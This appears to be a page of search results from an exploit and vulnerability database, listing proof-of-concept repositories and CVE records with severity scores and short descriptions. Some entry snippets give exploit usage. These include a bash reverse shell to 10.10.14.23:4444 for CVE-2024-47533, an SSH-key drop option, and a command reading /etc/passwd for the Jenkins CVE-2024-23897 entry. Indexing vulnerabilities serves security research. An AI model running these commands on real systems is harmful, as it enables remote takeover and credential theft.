Lucene search
+L

3051 matches found

Kitploit
Kitploit
added 2026/09/14 2:39 a.m.8 views

compaXSS

CompaXSS Bypass XSS Reflected Cross-site scripting ======= root@kitploit: Example: python compaxss.py --url https://support.snapchat.com/login?next=-run Developers Jose Pino - @jofpin Juan Eljach - @juaneljach...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/14 1:29 a.m.6 views

cve-2025-4664

CVE-2025-4664 This repository contains a PoC for exploiting CVE-2025-4664, a vulnerability where Chromium-based browsers leak sensitive URL parameters through Link header preload requests. Resources For a detailed explanation of how this exploit works, read the blog post:...

4.3CVSS6.6AI score0.05625EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/13 11:18 p.m.4 views

SSRF-Exploit-CVE-2024-27564

SSRF-Exploit-CVE-2024-27564 Project Title This project demonstrates a Server-Side Request Forgery SSRF vulnerability in the pictureproxy.php file. Description A vulnerability in pictureproxy.php allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This...

6.5CVSS7.5AI score0.40637EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/13 10:10 p.m.6 views

CVE-2024-47533

root@kitploit: Reverse shell python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i & /dev/tcp/10.10.14.23/4444 0&1"' Simple command python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id' Drop SSH key python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd...

9.8CVSS8.2AI score0.04003EPSS
SaveExploits6
CVE
CVE
added 2026/09/13 7:30 p.m.10 views

CVE-2026-90581

nginxWebUI (by cym1102, versions up to 4.4.2 ) is vulnerable to code injection in the MainController.autoUpdate function located at /adminPage/main/autoUpdate. The root cause is manipulation of the url argument, allowing a remote attacker with low privileges (no user interaction required) to exec...

6.5CVSS
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/13 6:45 p.m.9 views

CVE-2022-22947

CVE-2022-22947 Usage: root@kitploit: python3 CVE-2022-22947.py url...

10CVSS7.9AI score0.98253EPSS
SaveExploits54
Kitploit
Kitploit
added 2026/09/13 6:34 p.m.11 views

CVE-2024-50961

Sensitive Data Exposure CVE-2024-50961 Description In DonWeb Ferozo Hosting v1.1, a remote attacker can exploit URL parameters to access sensitive data, including database credentials. Attack vectors include network sniffing, server logs, and browser history, potentially exposing organizations to...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 5:15 p.m.7 views

CVE-2023-50596

CVE-2023-50596 Suggested description Cross Site Scripting vulnerability in Simple Image Stack Website using PHP and API v.1.00000 allows a remote attacker to execute arbitrary code via a crafted payload to the URL. Additional Information Lets paste our payload in the URL section...

6.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 5:14 p.m.7 views

exploit-CVE-2016-8016-25

McAfee Virus Scan for Linux multiple remote flaws THIS EXPLOIT AND ALL THE CODE IN THIS REPO WERE REMOVED TO AVOID ANY PROBLEMS REGARDING VIOLATING ANY MCAFEE LICENSE McAfee VirusScan Enterprise for Linux is a enterprise antivirus solution by Mcafee. Its unique, Linux-based on- access scanner...

8.1CVSS6.6AI score0.13293EPSS
SaveExploits7
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.36 views

WordPress StageShow <5.0.9 - Open Redirect

WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshowredirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter. id: CVE-2015-5461 info: name:...

6.4CVSS6AI score0.06283EPSS
SaveExploits2References5
Kitploit
Kitploit
added 2026/09/13 4:04 p.m.5 views

Jenkins-CVE-2024-23897-

Use the command:python 3 CVE-2024-23897 . py-l 2 . txt-f/etc/passwdWrite the URL into 2.txt to enable batch processing...

9.8CVSS8AI score0.99999EPSS
SaveExploits50
Kitploit
Kitploit
added 2026/09/13 3:19 p.m.6 views

CVE-2022-22947

在王政代码基础上添加了,两种反弹shell,出网探测, 运行行时缺少什么模块。使用pip下载哪个模块就行了。 输入可疑的url地址,注意端口后面不要跟'/' 1.先检测是否存在漏洞 默认命令执行的是whoami,因为好多命令执行并不会回显,whoami若回显成功则存在漏洞 返回内容有root,确定存在漏洞 2.反弹shell 输入公网ip与端口 若反弹成功,此页面会卡住。 若反弹失败,会直接结束 3.测试出网, 是为了功能4准备的 默认访问百度页面 4.使用java代码反弹shell 若不能反弹shell,可能不支持/dev/tcp...

10CVSS7.6AI score0.98253EPSS
SaveExploits54
Kitploit
Kitploit
added 2026/09/13 3:04 p.m.4 views

CVE-2024-36527

CVE-2024-36527 PoC 和批量扫描器 概述 CVE-2024-36527 概念验证代码:puppeteer-renderer v.3.2.0 及更早版本存在目录遍历漏洞。攻击者可利用文件协议操纵 URL 参数,从服务器读取敏感信息。 本工具基于 Zac Wang 发布的安全公告,PoC 由 M Ali 创建。 使用方法 单目标扫描 扫描单个目标端点: root@kitploit: python cve-2024-36527.py -u target 批量目标扫描 批量扫描多个目标: root@kitploit: python cve-2024-36527.py -f...

6.5CVSS8.2AI score0.02581EPSS
SaveExploits1References2
Kitploit
Kitploit
added 2026/09/13 1:44 p.m.4 views

CVE-2022-26134

CVE-2022-26134 Use: exploit.py url command...

9.8CVSS8.2AI score0.99999EPSS
SaveExploits77
Kitploit
Kitploit
added 2026/09/13 1:15 p.m.5 views

CVE-2021-22941

Use python3 exploit -u url --shell http://127.0.0.1/shell --ping 127.0.0.1 Reference https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html...

10CVSS8.2AI score0.53585EPSS
SaveExploits1
NVD
NVD
added 2026/09/13 11:17 a.m.5 views

CVE-2026-90769

Open Notebook before 1.11.0 fails to validate the URL parameter in POST /api/sources endpoint, allowing authenticated users to perform server-side requests to internal services. Attackers can supply arbitrary URLs to read cloud metadata, internal network services, and localhost-bound services...

8.3CVSS
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/13 10:58 a.m.6 views

CVE-2021-3131

CVE-2021-3131 Suggested description The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the 'creds' URL parameter. VulnerabilityType Other CWE-522 Insufficiently Protected Credentials Vendor of Product 1C Company Affected Product Code Base 1C:Enterprise 8 -...

7.5CVSS7.4AI score0.00954EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 7:53 a.m.7 views

CVE-2023-51214

Suggested description Cross Site Scripting vulnerability in Implementing an Activity Log in Your Web App Using PHP v.1 allows a remote attacker to execute arbitrary code via a crafted payload to the URL. Vulnerability Type Cross Site Scripting XSS Vendor of Product sourcecodester.com Affected...

6.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 7:13 a.m.5 views

CVE-2025-55182-exploit

CVE-2025-55182-exploit TL;DR 此工具仅用于合法的渗透测试目的。请勿参与任何非法活动。 使用方法 python3 exploit.py 演示视频...

10CVSS7.4AI score0.99802EPSS
SaveExploits391
Kitploit
Kitploit
added 2026/09/13 6:26 a.m.6 views

CVE-2019-1006

CVE-2019-1006 Usage: Enter "python CVE-2019-1006.py "url"" in the terminal, where url is the URL of the RDG Gateway server to be tested. For example: python CVE-2019-1006.py "https://www.aaa.com/"...

7.5CVSS7.4AI score0.06024EPSS
SaveExploits0
Rows per page
Query Builder